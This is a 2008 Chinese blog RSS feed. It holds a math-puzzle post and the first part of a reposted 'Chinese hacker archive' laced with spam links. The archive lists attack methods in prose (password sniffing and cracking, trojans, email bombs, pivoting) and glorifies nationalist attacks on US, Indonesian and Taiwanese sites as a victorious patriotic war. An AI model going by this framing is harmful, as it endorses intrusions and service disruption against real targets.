<?xml version="1.0" encoding="GBK" ?>
<rss version="2.0" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:dcterms="http://purl.org/dc/terms/">
 <channel>
  	  <title><![CDATA[一页书的博客]]></title>
	  <link>http://zhujiang8106.blog.163.com</link>
	  <description><![CDATA[原来爱情是这样:看了金刚发现原来物种也不是问题;看了断臂山知道性别不是问题; 从事制造业。]]></description>
	  <language>zh-CN</language>
	  <pubDate>Fri, 4 Jul 2008 13:28:28 +0800</pubDate>
	  <lastBuildDate>Fri, 4 Jul 2008 13:28:28 +0800</lastBuildDate>
	  <docs>http://blogs.law.harvard.edu/tech/rss</docs>
	  <generator><![CDATA[NetEase Space]]></generator>
	  <managingEditor><![CDATA[zhujiang8106]]></managingEditor>
	  <webMaster><![CDATA[一页书]]></webMaster>
		  <ttl>120</ttl>
	  <image>
	  	<title><![CDATA[一页书的博客]]></title>
	  	<url>http://ava.blog.163.com/photo/yH7YXGQuBU9qV4dOFc_rVA==/5656239657000906371.jpg</url>
	  	<link>http://zhujiang8106.blog.163.com</link>
	  </image>
  <item>
  	<title><![CDATA[一道3年级数学题,如果你答错了,说明你的智商低于100.]]></title>	
    <link>http://zhujiang8106.blog.163.com/blog/static/4191824020085137302885</link>
    <description><![CDATA[<div>一道3年级数学题，3分钟之内答错了，说明你的智商低于100！此题10人做9人错！ <BR>一天，有个年轻人来到小米步童鞋店里买了一双鞋子。 这双鞋子成本是15元，标价是21元。 结果是这个年轻人掏出50元要买这双鞋子。 小米步童鞋店当时没有零钱，用那50元向街坊换了50元的零钱，找给年轻人29元。 但是街坊後来发现那50元是假钞，小米步童鞋店无奈之下，还了街坊50元。 现在问题是：小米步童鞋店在这次交易中到底损失了多少钱 ? 每人只许发帖答一次！！！ 您3分钟之内作出的答案是错误的，证明你不适合玩股票！！！</div>]]></description>
	    <author><![CDATA[一页书]]></author>
	    <comments>http://zhujiang8106.blog.163.com/blog/static/4191824020085137302885</comments>
    <slash:comments>1</slash:comments>
    <guid isPermaLink="true">http://zhujiang8106.blog.163.com/blog/static/4191824020085137302885</guid>
    <pubDate>Fri, 13 Jun 2008 19:30:28 +0800</pubDate>
    <dcterms:modified>2008-06-13T19:30:28+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[中国黑客超强档案（一） ]]></title>	
    <link>http://zhujiang8106.blog.163.com/blog/static/4191824020083202296453</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">第一章：什么是<A href="http://www.3800hk.com/">黑客</A>？ </P>
<P style="TEXT-INDENT: 2em">1，<A href="http://www.3800hk.com/">黑客</A>的定义 </P>
<P style="TEXT-INDENT: 2em">提起<A href="http://www.3800hk.com/">黑客</A>，总是那么神秘莫测。在人们眼中，<A href="http://www.3800hk.com/">黑客</A>是一群聪明绝顶，精力旺盛的年轻人，一门心思地破译各种密码，以便偷偷地、未经允许地打入政府、企业或他人的计算机系统，窥视他人的隐私。那么，什么是<A href="http://www.3800hk.com/">黑客</A>呢？ </P>
<P style="TEXT-INDENT: 2em"><A href="http://www.3800hk.com/">黑客</A>（hacker），源于英语动词hack，意为“劈，砍”，引申为“干了一件非常漂亮的工作”。在早期麻省理工学院的校园俚语中，“<A href="http://www.3800hk.com/">黑客</A>”则有“恶作剧”之意，尤指手法巧妙、<A href="http://www.3800hk.com/">技术</A>高明的恶作剧。在日本《新<A href="http://www.3800hk.com/">黑客</A>词典》中，对<A href="http://www.3800hk.com/">黑客</A>的定义是“喜欢探索软件程序奥秘，并从中增长了其个人才干的人。他们不象绝大多数电脑使用者那样，只规规矩矩地了解别人指定了解的狭小部分知识。”由这些定义中，我们还看不出太贬义的意味。他们通常具有硬件和软件的高级知识，并有能力通过创新的方法剖析系统。“<A href="http://www.3800hk.com/">黑客</A>”能使更多的<A href="http://www.3800hk.com/">网络</A>趋于完善和安全，他们以保护<A href="http://www.3800hk.com/">网络</A>为目的，而以不正当侵入为手段找出<A href="http://www.3800hk.com/">网络</A><A href="http://www.3800hk.com/">漏洞</A>。 </P>
<P style="TEXT-INDENT: 2em">另一种入侵者是那些利用<A href="http://www.3800hk.com/">网络</A><A href="http://www.3800hk.com/">漏洞</A>破坏<A href="http://www.3800hk.com/">网络</A>的人。他们往往做一些重复的工作（如用暴力法破解口令），他们也具备广泛的电脑知识，但与<A href="http://www.3800hk.com/">黑客</A>不同的是他们以破坏为目的。这些群体成为“骇客”。当然还有一种人兼于<A href="http://www.3800hk.com/">黑客</A>与入侵者之间。 </P>
<P style="TEXT-INDENT: 2em">一般认为，<A href="http://www.3800hk.com/">黑客</A>起源于50年代麻省理工学院的实验室中，他们精力充沛，热衷于解决难题。60、70年代，“<A href="http://www.3800hk.com/">黑客</A>”一词极富褒义，用于指代那些独立思考、奉公守法的计算机迷，他们智力超群，对电脑全身心投入，从事<A href="http://www.3800hk.com/">黑客</A>活动意味着对计算机的最大潜力进行智力上的自由探索，为电脑<A href="http://www.3800hk.com/">技术</A>的发展做出了巨大贡献。正是这些<A href="http://www.3800hk.com/">黑客</A>，倡导了一场个人计算机革命，倡导了现行的计算机开放式体系结构，打破了以往计算机<A href="http://www.3800hk.com/">技术</A>只掌握在少数人手里的局面，开了个人计算机的先河，提出了“计算机为人民所用”的观点，他们是电脑发展史上的英雄。现在<A href="http://www.3800hk.com/">黑客</A>使用的侵入计算机系统的基本技巧，例如破解口令（password cracking），开天窗（trapdoor），走后门（backdoor），安放特洛伊木马（Trojan horse）等，都是在这一时期发明的。从事<A href="http://www.3800hk.com/">黑客</A>活动的经历，成为后来许多计算机业巨子简历上不可或缺的一部分。例如，苹果公司创始人之一乔布斯就是一个典型的例子。 </P>
<P style="TEXT-INDENT: 2em">在60年代，计算机的使用还远未普及，还没有多少存储重要信息的<A href="http://www.3800hk.com/">数据</A>库，也谈不上<A href="http://www.3800hk.com/">黑客</A>对<A href="http://www.3800hk.com/">数据</A>的非法拷贝等问题。到了80、90年代，计算机越来越重要，大型<A href="http://www.3800hk.com/">数据</A>库也越来越多，同时，信息越来越集中在少数人的手里。这样一场新时期的“圈地运动”引起了<A href="http://www.3800hk.com/">黑客</A>们的极大反感。<A href="http://www.3800hk.com/">黑客</A>认为，信息应共享而不应被少数人所垄断，于是将注意力转移到涉及各种机密的信息<A href="http://www.3800hk.com/">数据</A>库上。而这时，电脑化空间已私有化，成为个人拥有的财产，社会不能再对<A href="http://www.3800hk.com/">黑客</A>行为放任不管，而必须采取行动，利用法律等手段来进行控制。<A href="http://www.3800hk.com/">黑客</A>活动受到了空前的打击。 </P>
<P style="TEXT-INDENT: 2em">但是，政府和公司的管理者现在越来越多地要求<A href="http://www.3800hk.com/">黑客</A>传授给他们有关电脑安全的知识。许多公司和政府机构已经邀请<A href="http://www.3800hk.com/">黑客</A>为他们检验系统的安全性，甚至还请他们设计新的保安规程。在两名<A href="http://www.3800hk.com/">黑客</A>连续发现网景公司设计的信用卡购物程序的缺陷并向商界发出公告之后，网景修正了缺陷并宣布举办名为“网景缺陷大奖赛”的竞赛，那些发现和找到该公司产品中安全<A href="http://www.3800hk.com/">漏洞</A>的<A href="http://www.3800hk.com/">黑客</A>可获1000美元奖金。无疑<A href="http://www.3800hk.com/">黑客</A>正在对电脑防护<A href="http://www.3800hk.com/">技术</A>的发展作出贡献。 </P>
<P style="TEXT-INDENT: 2em">2，<A href="http://www.3800hk.com/">黑客</A>攻击 </P>
<P style="TEXT-INDENT: 2em">一些<A href="http://www.3800hk.com/">黑客</A>往往回采取一些几种方法，但是我很想说的是，一个优秀的<A href="http://www.3800hk.com/">黑客</A>绝不会随便攻击别人的。 </P>
<P style="TEXT-INDENT: 2em">1）、获取口令 　 </P>
<P style="TEXT-INDENT: 2em">这又有三种方法：一是通过<A href="http://www.3800hk.com/">网络</A>监听非法得到用户口令，这类方法有一定的局限性，但危害性极大，监听者往往能够获得其所在网段的所有用户账号和口令，对局域网安全威胁巨大；二是在知道用户的账号后（如电子邮件@前面的部分）利用一些专门软件强行破解用户口令，这种方法不受网段限制，但<A href="http://www.3800hk.com/">黑客</A>要有足够的耐心和时间；三是在获得一个<A href="http://www.3800hk.com/">服务</A>器上的用户口令文件（此文件成为Shadow文件）后，用暴力破解程序破解用户口令，该方法的使用前提是<A href="http://www.3800hk.com/">黑客</A>获得口令的Shadow文件。此方法在所有方法中危害最大，因为它不需要像第二种方法那样一遍又一遍地尝试登录<A href="http://www.3800hk.com/">服务</A>器，而是在本地将加密后的口令与Shadow文件中的口令相比较就能非常容易地破获用户密码，尤其对那些弱智用户(指口令安全系数极低的用户，如某用户账号为zys，其口令就是zys666、666666、或干脆就是zys等)更是在短短的一两分钟内，甚至几十秒内就可以将其干掉。 </P>
<P style="TEXT-INDENT: 2em">2）、放置特洛伊木马程序 　　 </P>
<P style="TEXT-INDENT: 2em">特洛伊木马程序可以直接侵入用户的电脑并进行破坏，它常被伪装成工具程序或者游戏等诱使用户打开带有特洛伊木马程序的邮件附件或从网上直接下载，一旦用户打开了这些邮件的附件或者执行了这些程序之后，它们就会象古特洛伊人在敌人城外留下的藏满士兵的木马一样留在自己的电脑中，并在自己的计算机系统中隐藏一个可以在windows启动时悄悄执行的程序。当您连接到因特网上时，这个程序就会通知<A href="http://www.3800hk.com/">黑客</A>，来报告您的IP地址以及预先设定的端口。<A href="http://www.3800hk.com/">黑客</A>在收到这些信息后，再利用这个潜伏在其中的程序，就可以任意地修改您的计算机的参数设定、复制文件、窥视你整个硬盘中的内容等，从而达到控制你的计算机的目的。 </P>
<P style="TEXT-INDENT: 2em">3）、WWW的欺骗<A href="http://www.3800hk.com/">技术</A> 　　 </P>
<P style="TEXT-INDENT: 2em">在网上用户可以利用IE等浏览器进行各种各样的WEB站点的访问，如阅读新闻组、咨询产品价格、订阅报纸、电子商务等。然而一般的用户恐怕不会想到有这些问题存在：正在访问的网页已经被<A href="http://www.3800hk.com/">黑客</A>篡改过，网页上的信息是虚假的！例如<A href="http://www.3800hk.com/">黑客</A>将用户要浏览的网页的URL改写为指向<A href="http://www.3800hk.com/">黑客</A>自己的<A href="http://www.3800hk.com/">服务</A>器，当用户浏览目标网页的时候，实际上是向<A href="http://www.3800hk.com/">黑客</A><A href="http://www.3800hk.com/">服务</A>器发出请求，那么<A href="http://www.3800hk.com/">黑客</A>就可以达到欺骗的目的了。 </P>
<P style="TEXT-INDENT: 2em">4）、电子邮件攻击 　　 </P>
<P style="TEXT-INDENT: 2em">电子邮件攻击主要表现为两种方式：一是电子邮件轰炸和电子邮件“滚雪球”，也就是通常所说的邮件炸弹，指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件，致使受害人邮箱被“炸”，严重者可能会给电子邮件<A href="http://www.3800hk.com/">服务</A>器操作系统带来危险，甚至瘫痪；二是电子邮件欺骗，攻击者佯称自己为系统管理员（邮件地址和系统管理员完全相同），给用户发送邮件要求用户修改口令（口令可能为指定字符串）或在貌似正常的附件中加载病毒或其他木马程序（据笔者所知，某些单位的<A href="http://www.3800hk.com/">网络</A>管理员有定期给用户<A href="http://www.3800hk.com/">免费</A>发送防火墙升级程序的义务，这为<A href="http://www.3800hk.com/">黑客</A>成功地利用该方法提供了可乘之机)，这类欺骗只要用户提高警惕，一般危害性不是太大。 </P>
<P style="TEXT-INDENT: 2em">5）、通过一个节点来攻击其他节点 　　 </P>
<P style="TEXT-INDENT: 2em"><A href="http://www.3800hk.com/">黑客</A>在突破一台主机后，往往以此主机作为根据地，攻击其他主机(以隐蔽其入侵路径，避免留下蛛丝马迹)。他们可以使用<A href="http://www.3800hk.com/">网络</A>监听方法，尝试攻破同一<A href="http://www.3800hk.com/">网络</A>内的其他主机；也可以通过IP欺骗和主机信任关系，攻击其他主机。这类攻击很狡猾，但由于某些<A href="http://www.3800hk.com/">技术</A>很难掌握，如IP欺骗，因此较少被<A href="http://www.3800hk.com/">黑客</A>使用。 </P>
<P style="TEXT-INDENT: 2em">6）、<A href="http://www.3800hk.com/">网络</A>监听 　　 </P>
<P style="TEXT-INDENT: 2em"><A href="http://www.3800hk.com/">网络</A>监听是主机的一种工作模式，在这种模式下，主机可以接受到本网段在同一条物理通道上传输的所有信息，而不管这些信息的发送方和接受方是谁。此时，如果两台主机进行通信的信息没有加密，只要使用某些<A href="http://www.3800hk.com/">网络</A>监听工具，例如NetXray for windows 95/98/nt，sniffit for linux 、solaries等就可以轻而易举地截取包括口令和<A href="http://www.3800hk.com/">帐号</A>在内的信息资料。虽然<A href="http://www.3800hk.com/">网络</A>监听获得的用户<A href="http://www.3800hk.com/">帐号</A>和口令具有一定的局限性，但监听者往往能够获得其所在网段的所有用户<A href="http://www.3800hk.com/">帐号</A>及口令。 </P>
<P style="TEXT-INDENT: 2em">7）、寻找系统<A href="http://www.3800hk.com/">漏洞</A> 　　 </P>
<P style="TEXT-INDENT: 2em">许多系统都有这样那样的安全<A href="http://www.3800hk.com/">漏洞</A>（Bugs），其中某些是操作系统或应用软件本身具有的，如Sendmail<A href="http://www.3800hk.com/">漏洞</A>，win98中的共享目录密码验证<A href="http://www.3800hk.com/">漏洞</A>和IE5<A href="http://www.3800hk.com/">漏洞</A>等，这些<A href="http://www.3800hk.com/">漏洞</A>在补丁未被开发出来之前一般很难防御<A href="http://www.3800hk.com/">黑客</A>的破坏，除非你将网线拔掉；还有一些<A href="http://www.3800hk.com/">漏洞</A>是由于系统管理员配置错误引起的，如在<A href="http://www.3800hk.com/">网络</A>文件系统中，将目录和文件以可写的方式调出，将未加Shadow的用户密码文件以明码方式存放在某一目录下，这都会给<A href="http://www.3800hk.com/">黑客</A>带来可乘之机，应及时加以修正。 </P>
<P style="TEXT-INDENT: 2em">8）、利用<A href="http://www.3800hk.com/">帐号</A>进行攻击 　　 </P>
<P style="TEXT-INDENT: 2em">有的<A href="http://www.3800hk.com/">黑客</A>会利用操作系统提供的缺省账户和密码进行攻击，例如许多UNIX主机都有FTP和Guest等缺省账户（其密码和账户名同名），有的甚至没有口令。<A href="http://www.3800hk.com/">黑客</A>用Unix操作系统提供的命令如Finger和Ruser等收集信息，不断提高自己的攻击能力。这类攻击只要系统管理员提高警惕，将系统提供的缺省账户关掉或提醒无口令用户增加口令一般都能克服。 </P>
<P style="TEXT-INDENT: 2em">9）、偷取特权 　　 </P>
<P style="TEXT-INDENT: 2em">利用各种特洛伊木马程序、后门程序和<A href="http://www.3800hk.com/">黑客</A>自己编写的导致缓冲区溢出的程序进行攻击，前者可使<A href="http://www.3800hk.com/">黑客</A>非法获得对用户机器的完全控制权，后者可使<A href="http://www.3800hk.com/">黑客</A>获得超级用户的权限，从而拥有对整个<A href="http://www.3800hk.com/">网络</A>的绝对控制权。这种攻击手段，一旦奏效，危害性极大。 </P>
<P style="TEXT-INDENT: 2em">第二章：中国电脑<A href="http://www.3800hk.com/">黑客</A>起源 </P>
<P style="TEXT-INDENT: 2em">1，中国<A href="http://www.3800hk.com/">黑客</A>的起源（1994年－1996年） </P>
<P style="TEXT-INDENT: 2em">1994年，是中国互联网处于刚刚开始发展的朦胧时期，也就是在这一年，中国互联网的大门终于面向公众开放了。但是在那个年代，电脑还是一件非常奢侈的电子用品，而互联网对于大众来说更是一个陌生的名词，我们只有在专业性极强的书刊中能够找到与<A href="http://www.3800hk.com/">网络</A>相关的名词，而那些上网的群体也多数为科研人员和年轻知本家（那个时候小资群体还没有提出）。各地电脑发烧友最大的乐趣就是COPY那些小游戏和DOS等软件类产品，盗版对我们来说还是一个陌生的名词，对于广大计算机用户来说，COPY就是正版的一种传播方式。于是乎那个时代最早的<A href="http://www.3800hk.com/">黑客</A>或者说“窃客”诞生了。那个时候我们没有太多的理想和豪言壮语，一个全新的小软件就几乎是我们计算机的全部生命与理解，而对于这些窃客来说能够COPY到国外的最新产品是他们最大的荣幸，那一张张的小软盘中承载了中国<A href="http://www.3800hk.com/">黑客</A>最初的梦想。也正是从那个时期起，雷军等众多我们现在熟知的人从这里引领起中国软件与互联网业发展的浪潮。 </P>
<P style="TEXT-INDENT: 2em">在那个中国<A href="http://www.3800hk.com/">网络</A>最为朦胧的岁月里，大多数玩家操作着比9600 Bits/s还小的雏猫，在最为原始的<A href="http://www.3800hk.com/">网络</A>上奔驰。那不是我们现在传统意义上的Internet，而是最为初级的BBS站，一种依靠拨电话号码直接连接到BBS<A href="http://www.3800hk.com/">服务</A>器上的方式来交流。他们上的最多的是中国惠多网，而非Internet。足球和软件加解密成为最热门的话题，注册码的交换让许多人乐此不疲。更多的BBS方式的<A href="http://www.3800hk.com/">服务</A>器在全国各大城市出现，软件的交换破解成为最为热门的话题，单单一套Linux就能够卖到1200元。那个时代的玩家现如今均已成为了驰骋互联网的风云人物。 </P>
<P style="TEXT-INDENT: 2em">时光转眼到了1996年，在中国网民的年代分类中，在1996年以前接触<A href="http://www.3800hk.com/">网络</A>的人均被称之为中国的第一代网民，或许在这其中有些人从来没有接触过Internet，所接触的最多也是那种电话连接的BBS，但是他们仍然无愧于中国第一代网民。1995年－1996年这一期间，中国各个大中城市的互联网信息港基本已经初具规模，中国国际互联网的第一代网管诞生，中国第一代的大众网民也开始走出BBS，而融入这种天地更为广阔的Internet。那两年是中国互联网初步成长时期，也同样是中国软件业开始蓬勃发展的时期。那个平静的年头中，中国<A href="http://www.3800hk.com/">网络</A>人以自己的方式做着自己的梦，在这些人中很多是接触过早期BBS的网友，在他们看来，从BBS移师Internet只不过将自己的舞台扩大了一些，让自己的眼睛看得更多了一些。而他们在BBS上最初所进行的那些活动也迁移到了Internet这个更为广阔的空间。在这一期间中国<A href="http://www.3800hk.com/">网络</A>窃客<A href="http://www.3800hk.com/">技术</A>飞速发展，也从此诞生了一批传奇式人物，这里面最为出名的当属高春辉，他的个人主页在当时以破解软件和注册码为主，在那个软件极度匮乏的时期，他创造了中国个人网页访问量第一的传奇历史。当然在那个阶段，除了窃客以外，电话飞客也曾出现在中国，但是由于程控交换机的出现，飞客很快的成为了历史。1996年底，中国电信开始实行优惠上网政策，在此之后中国<A href="http://www.3800hk.com/">网络</A>开始了真正步入百姓家庭的步伐。 </P>
<P style="TEXT-INDENT: 2em">2，有些名字我们不得不提起： </P>
<P style="TEXT-INDENT: 2em">　　周志农－自然码发明人，开创大自然BBS站。 </P>
<P style="TEXT-INDENT: 2em">　　马化腾（Pony Ma）－滕讯公司总裁，中国惠多网第一批网友。 </P>
<P style="TEXT-INDENT: 2em">　　求伯君－金山公司总裁，开创西线和西点BBS站。 </P>
<P style="TEXT-INDENT: 2em">　　罗依（Roy Luo）、钟东（Dr.Arab）、潘德强…… </P>
<P style="TEXT-INDENT: 2em">　　这些我们熟悉或者不太熟悉的人们，在那个年代，以他们特有的方式进行着中国<A href="http://www.3800hk.com/">网络</A>人特殊的梦，也以他们的方式孵化出中国第一代<A href="http://www.3800hk.com/">黑客</A>的雏形－窃客。 </P>
<P style="TEXT-INDENT: 2em">第三章：中国电脑<A href="http://www.3800hk.com/">黑客</A>的成长 </P>
<P style="TEXT-INDENT: 2em">1，温故1997至1999—— </P>
<P style="TEXT-INDENT: 2em">　　1997年在中国互联网发展史应该是最为值得纪念的一年，而在中国<A href="http://www.3800hk.com/">黑客</A>成长过程中，那一时期也哺育了众多的初级<A href="http://www.3800hk.com/">黑客</A>，互联网这一个名词也逐渐被大众接受，新的思想，新的观念也逐渐从<A href="http://www.3800hk.com/">网络</A>中折射出来。在1997年初期，YAHOO搜索引擎中只能够搜索出7个跟<A href="http://www.3800hk.com/">黑客</A>相关的简体中文网页。而且网站中的内容多数是翻译或者重复国外相同网页的内容，很多没有实际意义。不过此时“<A href="http://www.3800hk.com/">黑客</A>”这一个名词已经开始正式的深入广大网友之中，当时初级<A href="http://www.3800hk.com/">黑客</A>所掌握的最高<A href="http://www.3800hk.com/">技术</A>仅仅是使用邮箱炸弹，并且多数是国外的工具，完全没有自己的<A href="http://www.3800hk.com/">黑客</A>武器，更不要说自己的精神领袖。那个时期世界上的<A href="http://www.3800hk.com/">黑客</A>共同有追随着一个精神领袖：凯文?;米特尼克，世界头号<A href="http://www.3800hk.com/">黑客</A>。这位传奇性人物不单单的领导着美国<A href="http://www.3800hk.com/">黑客</A>的思想，也影响着中国初级<A href="http://www.3800hk.com/">黑客</A>前进与探索的方向。 </P>
<P style="TEXT-INDENT: 2em">　　1998年正当我们国内开始轰轰烈烈的开展互联网大跃进活动的时期，在大洋彼岸的美国，一年一度的<A href="http://www.3800hk.com/">黑客</A>大会上由一个名为“死牛崇拜”<A href="http://www.3800hk.com/">黑客</A>小组公布了一款名叫“Back Orifice”的<A href="http://www.3800hk.com/">黑客</A>软件，并将源代码一起发布。这个软件掀起了全球性的计算机<A href="http://www.3800hk.com/">网络</A>安全问题，并推进了“特洛伊木马”这种<A href="http://www.3800hk.com/">黑客</A>软件的飞速发展。BO公布后，透过刚刚兴起的互联网迅速传到了中国，当时很多网友就是使用这款软件开始了对<A href="http://www.3800hk.com/">黑客</A>生涯的初恋。但是BO并没有在中国掀起浪潮，当然因素是多种多样的，比如<A href="http://www.3800hk.com/">网络</A>尚在发展中，BO为舶来品不方便中国网友使用等。但是BO没有辉煌的另一个主要原因是CIH病毒的诞生和大规模发作。这个有史以来第一个以感染主板BIOS为主要攻击目标的病毒给中国经济带来了数百亿元的损失，也让大陆<A href="http://www.3800hk.com/">黑客</A>第一次感受到了来自海峡对面的野心与威胁。 </P>
<P style="TEXT-INDENT: 2em">　　1998给还处在发育期的中国<A href="http://www.3800hk.com/">黑客</A>带来了太多的惊奇、恐惧、理想与动力。在BO诞生不久，中国<A href="http://www.3800hk.com/">黑客</A>自己的特洛伊木马也诞生了，这就是<A href="http://www.3800hk.com/">网络</A>间谍NetSpy。但是NetSpy的诞生并没有给中国<A href="http://www.3800hk.com/">黑客</A>的发展带来太大的震动，这一切都让CIH的光芒所掩盖了。在随后的日子里以谢朝霞、PP（彭泉）、天行（陈伟山）等为代表程序员<A href="http://www.3800hk.com/">黑客</A>开始显露头角，少量的国产工具开始小范围流行于中国<A href="http://www.3800hk.com/">黑客</A>之间。当大家正在忙于为杀毒而忙得不可开交的时候，一次国际性事件掀起了中国<A href="http://www.3800hk.com/">黑客</A>首次浪潮。 </P>
<P style="TEXT-INDENT: 2em">　　1998年7－8月份，在印度尼西亚爆发了大规模的屠杀、强奸、残害印尼华人的排华事件。众多华人妇女被野蛮的强奸杀害，华人的超市被抢夺一空，很多丧失人性的印尼反华分子还将大量残害华人的图片发到了互联网上。这一系列行为激怒了刚刚学会蹒跚走步的中国<A href="http://www.3800hk.com/">黑客</A>们，他们不约而同的聚集在IRC<A href="http://www.3800hk.com/">聊天</A>室中，并以八至六人为单位，向印尼政府网站的信箱中发送垃圾邮件，用Ping的方式攻击印尼网站。这些现在看来很幼稚的攻击方法造就了中国<A href="http://www.3800hk.com/">黑客</A>最初的团结与坚强的精神，为后来的中国红客的形成铺垫了基础。为了号召更多的人加入战斗，有几位<A href="http://www.3800hk.com/">技术</A>性<A href="http://www.3800hk.com/">黑客</A>牵头组建了“中国<A href="http://www.3800hk.com/">黑客</A>紧急会议中心”负责对印尼网站攻击期间的协调工作。印尼排华事件造就了一大批网友投身于<A href="http://www.3800hk.com/">黑客</A>这项活动中来，有些人在攻击过后又回到了现实生活中，有些人则从此开始了对<A href="http://www.3800hk.com/">黑客</A>理想的执著追求。同样这次事件也使得“绿色兵团”这个<A href="http://www.3800hk.com/">黑客</A>组织的名字享誉中国互联网，并造就了后来的“中联绿盟”。 </P>
<P style="TEXT-INDENT: 2em">　　轰轰烈烈的印尼排华事件过后，中国<A href="http://www.3800hk.com/">黑客</A>似乎又回归于平静，继续着对理想的执著追求与探索，UNIX、Linux、Http、FTP等<A href="http://www.3800hk.com/">网络</A><A href="http://www.3800hk.com/">技术</A>性问题和<A href="http://www.3800hk.com/">黑客</A><A href="http://www.3800hk.com/">技术</A>成为了中国<A href="http://www.3800hk.com/">黑客</A>的主要话题，无力的反击让中国<A href="http://www.3800hk.com/">黑客</A>开始有了新的反省，同样也激励起他们旺盛的斗志，他们如饥似渴的摄取<A href="http://www.3800hk.com/">技术</A>养分，<A href="http://www.3800hk.com/">黑客</A><A href="http://www.3800hk.com/">技术</A>性网站也开始逐渐增多，新的<A href="http://www.3800hk.com/">黑客</A><A href="http://www.3800hk.com/">技术</A>高手也再次涌现，这一时期最具代表性的<A href="http://www.3800hk.com/">技术</A>性<A href="http://www.3800hk.com/">黑客</A>当属流光、溯雪、乱刀等<A href="http://www.3800hk.com/">黑客</A>软件的开发者－小榕，以后的日子中，小榕执著的追求着自己的理想，使流光等这些优秀的软件在一次次升级与完善中走进了世界优秀<A href="http://www.3800hk.com/">黑客</A>软件的舞台。 </P>
<P style="TEXT-INDENT: 2em">　　1999年中国的互联网用户突飞猛增，创造了历史同期增长最快的水平，但是那一年也成为了每一个中国人和中国<A href="http://www.3800hk.com/">黑客</A>难忘的一年，这一年在中国<A href="http://www.3800hk.com/">黑客</A>发展的历史上是永远不可抹掉的一笔。那一年的4－5月份以美国为首的北约以种种借口对南斯拉夫塞尔维亚共和国发动了战争，随后的日子里中国人民在各种媒体发表了对正义的声援，<A href="http://www.3800hk.com/">网络</A>上更是掀起了对美国霸权主义的批判浪潮。但是就在5月份，美国的轰炸机竟悍然轰炸了我驻南联盟大使馆。消息一经传出，举国上下为之震惊与愤怒，全国各高校学子更是义愤填膺，水木清华等全国各大网站论坛的帖子与信息流量达到了历史的最高峰。 </P>
<P style="TEXT-INDENT: 2em">　　在战争的初期，中国<A href="http://www.3800hk.com/">黑客</A>的行动仅仅限于声援南联盟人民，并没有采取过多的过激行为。但当我驻南联盟大使馆被毫无理由的轰炸后，中国<A href="http://www.3800hk.com/">黑客</A>又一次大规模的团结了起来，纷纷开展了对美国网站的攻击。一直作为奋斗理想的美国<A href="http://www.3800hk.com/">黑客</A>精神迅速的被遗弃了，一时间，中国的<A href="http://www.3800hk.com/">黑客</A>没有了自己心目中的精神领袖，有的只是满腔的愤怒。在中国大使馆被炸后的第二天，第一个中国红客网站诞生了，同时也创造出了一个新的<A href="http://www.3800hk.com/">黑客</A>分支－红客。中国红客网站长分析家在看完中午的新闻后，以半个小时的时间做完了这个网站，并初步定名为“中国红客之祖国团结阵线”（随后的7月份改名为中国红客之祖国统一战线），以宣扬爱国主义红客精神为主导，网站宣言中不乏铿锵激扬的爱国词语，并引用了毛泽东青年时的话语：“国家是我们的国家，人民是我们的人民，我们不喊谁喊？我们不干谁干？”极负煽动力。网站在短短的数天内访问量已达50多万，并出现在新浪网的新闻链接中，中国红客从此成为了世界<A href="http://www.3800hk.com/">黑客</A>中特殊的一个群体，爱国与团结是他们永恒的精神理念。那次<A href="http://www.3800hk.com/">黑客</A>战争中，全世界的华人首次团结一致，众多美国网站被攻击，大规模的垃圾邮件也使得美国众多邮件<A href="http://www.3800hk.com/">服务</A>器瘫痪失灵，这次伟大的卫国<A href="http://www.3800hk.com/">黑客</A>战争取得了全面的胜利。 </P>
<P style="TEXT-INDENT: 2em">　　一切刚刚回归宁静不久，就在七月份，台湾李登辉突然抛出了两国论，海峡两岸局势顿时紧张。中国<A href="http://www.3800hk.com/">黑客</A>依靠由对美<A href="http://www.3800hk.com/">网络</A>反击战中总结出的经验，迅速的攻击了台湾行政院等网站，并给许多台湾<A href="http://www.3800hk.com/">服务</A>器安装了木马程序，导致很多鼓吹**的网站<A href="http://www.3800hk.com/">服务</A>器长时间瘫痪。值得一提的是，此次安装的木马程序由美国的BO首次改为了中国<A href="http://www.3800hk.com/">黑客</A>自己研发的“冰河”与NetSpy。而木马冰河也成为了中国<A href="http://www.3800hk.com/">黑客</A>最为钟爱的木马程序。 </P>
<P style="TEXT-INDENT: 2em">　　木马冰河是中国<A href="http://www.3800hk.com/">黑客</A>史中必须提到的一个软件，它由中国安全程序员黄鑫编写，黄鑫在最初开发这个软件最初版本的时候并没有考虑到它能够作为一个特洛伊木马来使用，但随后冰河疯狂流行于<A href="http://www.3800hk.com/">黑客</A>手中，很多用户在不知不觉中被冰河控制。早期的冰河还不能算是一个好的木马软件，随后黄鑫用了大量的时间对冰河进行代码重构，冰河2.2版本诞生了。新版本的冰河迅速被流传出去，并让大批初级<A href="http://www.3800hk.com/">黑客</A>快速的步入了<A href="http://www.3800hk.com/">黑客</A>这扇大门。中国<A href="http://www.3800hk.com/">黑客</A>软件的开发从此走向了新的纪元，再次之后，黑洞、<A href="http://www.3800hk.com/">网络</A>神偷、灰鸽子、XSan、YAI等众多优秀的国产<A href="http://www.3800hk.com/">黑客</A>软件纷纷涌现，<A href="http://www.3800hk.com/">黑客</A>也开始出现商业化迹象，由前“绿色兵团”成员组建的“中联绿盟”<A href="http://www.3800hk.com/">网络</A>安全公司成立，正式开始了<A href="http://www.3800hk.com/">黑客</A>向商业化迈进的脚步，中国<A href="http://www.3800hk.com/">黑客</A>逐渐成长了起来。 </P>
<P style="TEXT-INDENT: 2em">第四章：中国“绿色兵团” </P>
<P style="TEXT-INDENT: 2em">1，“绿色兵团的成立及发展。提起中国的<A href="http://www.3800hk.com/">黑客</A>，我们没办法不提到这个被众多网民誉为网上“黄浦军校”的中国最早的电脑<A href="http://www.3800hk.com/">黑客</A>组织：绿色兵团。 </P>
